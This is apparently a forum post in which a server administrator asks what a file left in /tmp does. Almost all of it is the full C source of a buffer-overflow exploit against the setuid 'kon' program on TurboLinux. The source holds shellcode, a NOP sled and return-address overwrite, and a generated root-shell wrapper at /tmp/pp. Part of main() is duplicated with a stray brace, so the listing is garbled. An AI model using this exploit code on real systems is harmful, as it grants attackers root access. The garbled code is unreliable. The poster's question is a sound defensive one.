Some one put this file in /tmp dir
What this code doing?, How could we know that they have successfully run this code?
We have everything updated on our server. Any comments?
/*=============================================================================
Linux kon/kon2 Exploit for Linux
The Shadow Penguin Security (http://shadowpenguin.backsection.net)
Written by UNYUN (shadowpenguin@backsection.net)(TurboLinux1.0/2.0/3.0/4.2)
=============================================================================
*/
#include <stdlib.h>
#include <stdio.h>
#define KON_PATH "/usr/bin/kon"
#define RET_ADR 260
#define JMP_OFS 0x2474
#define CODE_OFS 320
#define MAXBUF 8000
#define NOP 0x90
#define SHELL "/tmp/pp"
#define COMPILER "gcc"
char exec[80]=
"\xeb\x31\x5e\x89\x76\x08\x31\xc0\x31\xd2\xb2\x04\x88\x46\x07\x01"
"\xd6\x89\x46\x08\x29\xd6\xb0\x08\xfe\xc0\xfe\xc0\xfe\xc0\x89\xf3"
"\x8d\x4e\x08\x01\xd6\x8d\x56\x08\x29\xd6\xcd\x80\x31\xdb\x89\xd8"
"\x40\xcd\x80\xe8\xca\xff\xff\xff"; // for kon/kon2 exploit
char xx[MAXBUF+1];
unsigned int i,ip,sp;
FILE *fp;
unsigned long get_sp(void)
{
__asm__("movl %esp, %eax");
}
main(int argc,char *argv[])
{
strcat(exec,SHELL);
sprintf(xx,"%s.c",SHELL);
if ((fp=fopen(xx,"w"))==NULL){
printf("Can not write to %s\n",xx);
exit(1);
}
fprintf(fp,"main(){setuid(0);setgid(0);system(\"/bin/sh\");}");
fclose(fp);
sprintf(xx,"%s %s.c -o %s",COMPILER,SHELL,SHELL);
printf("Can not write to %s\n",xx);
exit(1);
}
fprintf(fp,"main(){setuid(0);setgid(0);system(\"/bin/sh\");}");
fclose(fp);
sprintf(xx,"%s %s.c -o %s",COMPILER,SHELL,SHELL);
system(xx);
sp=get_sp();
printf("ESP = %x\n",sp);
memset(xx,NOP,MAXBUF);
ip=sp-JMP_OFS;
xx[RET_ADR ]=ip&0xff;
xx[RET_ADR+1]=(ip>>8)&0xff;
xx[RET_ADR+2]=(ip>>16)&0xff;
xx[RET_ADR+3]=(ip>>24)&0xff;
strncpy(xx+CODE_OFS,exec,strlen(exec));
xx[MAXBUF-1]=0;
execl(KON_PATH,"kon","-MOUSE",xx,(char *) 0);
}
/* www.hack.co.za [2 Febuary 2001]*/
